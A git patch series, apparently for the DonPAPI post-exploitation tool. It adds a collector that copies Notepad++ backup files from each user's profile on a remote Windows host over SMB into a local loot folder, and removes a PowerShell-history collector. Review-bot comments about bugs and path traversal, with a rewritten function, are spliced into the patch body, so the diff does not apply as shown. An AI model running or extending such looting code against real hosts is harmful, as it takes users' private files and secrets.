From a06ca5e8a6c344a4701fc49978cff829b44bc114 Mon Sep 17 00:00:00 2001
From: Deft_
Date: Thu, 17 Oct 2024 15:26:46 +0200
Subject: [PATCH 1/4] Update entry.py

---
 donpapi/entry.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/donpapi/entry.py b/donpapi/entry.py
index 8fdaab1..f6cc122 100644
--- a/donpapi/entry.py
+++ b/donpapi/entry.py
@@ -40,6 +40,7 @@ from donpapi.collectors.recent_files import FilesDump, TAG as FilesTag
 from donpapi.collectors.sccm import SCCMDump, TAG as SCCMTag
 from donpapi.collectors.mremoteng import MRemoteNgDump, TAG as MRemoteNgTag
 from donpapi.collectors.vnc import VNCDump, TAG as VNCTag
+from donpapi.collectors.notepadpp import NotepadPPDump, TAG as NotepadPPTag
 from donpapi.collectors.powershellhistory import PowerShellHistoryDump, TAG as PowerShellHistoryTag
 from donpapi.lib.config import DonPAPIConfig, parse_config_file
 from donpapi.lib.database import Database, create_db_engine
@@ -63,7 +64,8 @@ COLLECTORS_LIST = {
 VaultsTag: VaultsDump,
 VNCTag: VNCDump,
 WifiTag: WifiDump,
- PowerShellHistoryTag: PowerShellHistoryDump
+ PowerShellHistoryTag: PowerShellHistoryDump,
+ NotepadPPTag: NotepadPPDump
 }
 
 def set_main_logger(logger , host = "\U0001F480"):

From 1afae5f083798cc5cb36fedfd594cc3173c870b0 Mon Sep 17 00:00:00 2001
From: Deft_
Date: Thu, 17 Oct 2024 15:27:14 +0200
Subject: [PATCH 2/4] Create notepadpp.py

---
 donpapi/collectors/notepadpp.py | 61 +++++++++++++++++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 donpapi/collectors/notepadpp.py

diff --git a/donpapi/collectors/notepadpp.py b/donpapi/collectors/notepadpp.py
new file mode 100644
index 0000000..39d2a4b
--- /dev/null
+++ b/donpapi/collectors/notepadpp.py
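Review bot: The context line `from donpapi.collectors.powershellhistory import PowerShellHistoryDump, TAG as PowerShellHistoryTag` in the first hunk, and `PowerShellHistoryTag: PowerShellHistoryDump,` in the second, are both kept, yet PATCH 3/4 of this same series deletes `donpapi/collectors/powershellhistory.py`, so once the series is applied as shown `donpapi.entry` fails at import time and the new NotepadPP collector is never reached. The import and the COLLECTORS_LIST entry should go in the patch that deletes the module, or the module should stay. This patch also registers `NotepadPPDump` one commit before PATCH 2/4 creates `donpapi/collectors/notepadpp.py`, so the tree does not import at this commit either; squashing 1/4 with 2/4 (and fixing 3/4 as above) keeps every commit buildable.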
@@ -0,0 +1,61 @@
+import os
+import ntpath
+from typing import Any
+from dploot.lib.target import Target
+from dploot.lib.smb import DPLootSMBConnection
+from donpapi.core import DonPAPICore
+from donpapi.lib.logger import DonPAPIAdapter
+
+
+TAG = "NotepadPP"
+
+class NotepadPPDump:
+ false_positive = [".", "..", "desktop.ini", "Public", "Default", "Default User", "All Users", ".NET v4.5", ".NET v4.5 Classic"]
+ user_directories = ["Users\\{username}\\AppData\\Roaming\\Notepad++\\backup\\"]
+ max_filesize = 5000000
+
+ def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore) -> None:
+ self.target = target
+ self.conn = conn
+ self.masterkeys = masterkeys
+ self.options = options
+ self.logger = logger
+ self.context = context
+ self.found = 0
+
+ def run(self):
+
+ self.logger.display("Gathering notepad++ backup files")
+ for user in self.context.users:
+ for directory in self.user_directories:
+ directory_path = directory.format(username=user)
+ self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10)
+ self.logger.secret(f"Found {self.found} notepad++ backup files", TAG)
+
+ def dig_files(self, directory_path, recurse_level=0, recurse_max=10):
+ directory_list = self.conn.remote_list_dir(self.context.share, directory_path)
+ if directory_list is not None:
+ for item in directory_list:
+ if item.get_longname() not in self.false_positive:
+ self.found += 1
+ new_path = ntpath.join(directory_path, item.get_longname())
+ file_content = self.conn.readFile(self.context.share, new_path)
+ local_filepath = os.path.join(self.context.output_dir, *(new_path.split('\\')))
+ # Stores the file in loot\TARGET\Users\{username}\AppData\
+ os.makedirs(os.path.dirname(local_filepath), exist_ok=True)
+ with open(local_filepath, "wb") as f:
+ if file_content is None:
+ file_content = b""
+ f.write(file_content)
+
+ # Stores files in loot\PowerShellHistory
+ os.makedirs(f"{self.context.output_dir}/../NotepadPP", exist_ok=True)
+ local_filepath = os.path.join(
+ f"{self.context.output_dir}/../NotepadPP",
+ f"{item.get_longname()}-{self.found}"
+ )
+ with open(local_filepath, "wb") as f:
+ if file_content is None:
+ file_content = b""
+ f.write(file_content)
+

From 9947dae00a7eb98fd176810cac143cef90678b5d Mon Sep 17 00:00:00 2001
From: Deft_
Date: Thu, 17 Oct 2024 15:35:10 +0200
Subject: [PATCH 3/4] Delete donpapi/collectors/powershellhistory.py

---
 donpapi/collectors/powershellhistory.py | 61 -------------------------
 1 file changed, 61 deletions(-)
 delete mode 100644 donpapi/collectors/powershellhistory.py

diff --git a/donpapi/collectors/powershellhistory.py b/donpapi/collectors/powershellhistory.py
deleted file mode 100644
index e5f87a9..0000000
--- a/donpapi/collectors/powershellhistory.py
+++ /dev/null
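Review bot: `dig_files` declares `recurse_level`/`recurse_max` and the class declares `max_filesize = 5000000`, but none of them is read: every entry not in `false_positive` goes straight to `readFile`, so a sub-directory under the backup folder is read as if it were a file and a large backup is pulled into memory with no size cap. The entries from `remote_list_dir` look like impacket SharedFile objects (`get_longname()` is called on them), which also expose `is_directory()` and `get_filesize()`; checking those before the read and recursing into directories up to `recurse_max` would give the parameters their stated meaning. `self.found += 1` runs before the read, so a failed read (`None`) is still counted and still produces an empty loot file, and the `if file_content is None` guard is duplicated in both `with` blocks. The remote name from `get_longname()` is also used unmodified in the local path under `output_dir` (via `new_path.split('\\')` and `os.path.join`); a share served by a hostile host could return a name containing `/` or `..` and steer the write outside the loot directory, so path separators in the name should be rejected before the join. Finally, `user_directories` here lacks the leading backslash the deleted PowerShell collector used (`"\\Users\\..."`); whether `remote_list_dir` tolerates the relative form is not visible in this series, so it is worth confirming against the other collectors.

```python
    def dig_files(self, directory_path, recurse_level=0, recurse_max=10):
        directory_list = self.conn.remote_list_dir(self.context.share, directory_path)
        if directory_list is None:
            return
        for item in directory_list:
            name = item.get_longname()
            if name in self.false_positive:
                continue
            # Remote names are untrusted input; never let one escape output_dir.
            if "/" in name or "\\" in name:
                continue
            new_path = ntpath.join(directory_path, name)
            if item.is_directory():
                if recurse_level < recurse_max:
                    self.dig_files(directory_path=new_path, recurse_level=recurse_level + 1, recurse_max=recurse_max)
                continue
            if item.get_filesize() > self.max_filesize:
                continue
            file_content = self.conn.readFile(self.context.share, new_path)
            if file_content is None:
                continue
            self.found += 1
            # … unchanged: the two local writes (per-user tree and loot\NotepadPP), minus the now-redundant None guards …
```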
@@ -1,61 +0,0 @@
-import os
-import ntpath
-from typing import Any
-from dploot.lib.target import Target
-from dploot.lib.smb import DPLootSMBConnection
-from donpapi.core import DonPAPICore
-from donpapi.lib.logger import DonPAPIAdapter
-
-
-TAG = "PowerShellHistory"
-
-class PowerShellHistoryDump:
- false_positive = [".", "..", "desktop.ini", "Public", "Default", "Default User", "All Users", ".NET v4.5", ".NET v4.5 Classic"]
- user_directories = ["\\Users\\{username}\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\"]
- max_filesize = 5000000
-
- def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore) -> None:
- self.target = target
- self.conn = conn
- self.masterkeys = masterkeys
- self.options = options
- self.logger = logger
- self.context = context
- self.found = 0
-
- def run(self):
-
- self.logger.display("Gathering powershell history files")
- for user in self.context.users:
- for directory in self.user_directories:
- directory_path = directory.format(username=user)
- self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10)
- self.logger.secret(f"Found {self.found} powershell history files", TAG)
-
- def dig_files(self, directory_path, recurse_level=0, recurse_max=10):
- directory_list = self.conn.remote_list_dir(self.context.share, directory_path)
- if directory_list is not None:
- for item in directory_list:
- if item.get_longname() not in self.false_positive:
- self.found += 1
- new_path = ntpath.join(directory_path, item.get_longname())
- file_content = self.conn.readFile(self.context.share, new_path)
- local_filepath = os.path.join(self.context.output_dir, *(new_path.split('\\')))
- # Stores the file in loot\TARGET\Users\{username}\AppData\
- os.makedirs(os.path.dirname(local_filepath), exist_ok=True)
- with open(local_filepath, "wb") as f:
- if file_content is None:
- file_content = b""
- f.write(file_content)
-
- # Stores files in loot\PowerShellHistory
- os.makedirs(f"{self.context.output_dir}/../PowerShellHistory", exist_ok=True)
- local_filepath = os.path.join(
- f"{self.context.output_dir}/../PowerShellHistory",
- f"{item.get_longname()}-{self.found}"
- )
- with open(local_filepath, "wb") as f:
- if file_content is None:
- file_content = b""
- f.write(file_content)
-

From 31584d5bdb98a1cdb03772572794b59f42b43a9a Mon Sep 17 00:00:00 2001
From: Deft_
Date: Fri, 18 Oct 2024 08:01:33 +0200
Subject: [PATCH 4/4] Update notepadpp.py

---
 donpapi/collectors/notepadpp.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/donpapi/collectors/notepadpp.py b/donpapi/collectors/notepadpp.py
index 39d2a4b..39d78e0 100644
--- a/donpapi/collectors/notepadpp.py
+++ b/donpapi/collectors/notepadpp.py
@@ -48,7 +48,7 @@ class NotepadPPDump:
 file_content = b""
 f.write(file_content)
 
- # Stores files in loot\PowerShellHistory
+ # Stores files in loot\NotepadPP
 os.makedirs(f"{self.context.output_dir}/../NotepadPP", exist_ok=True)
 local_filepath = os.path.join(
 f"{self.context.output_dir}/../NotepadPP",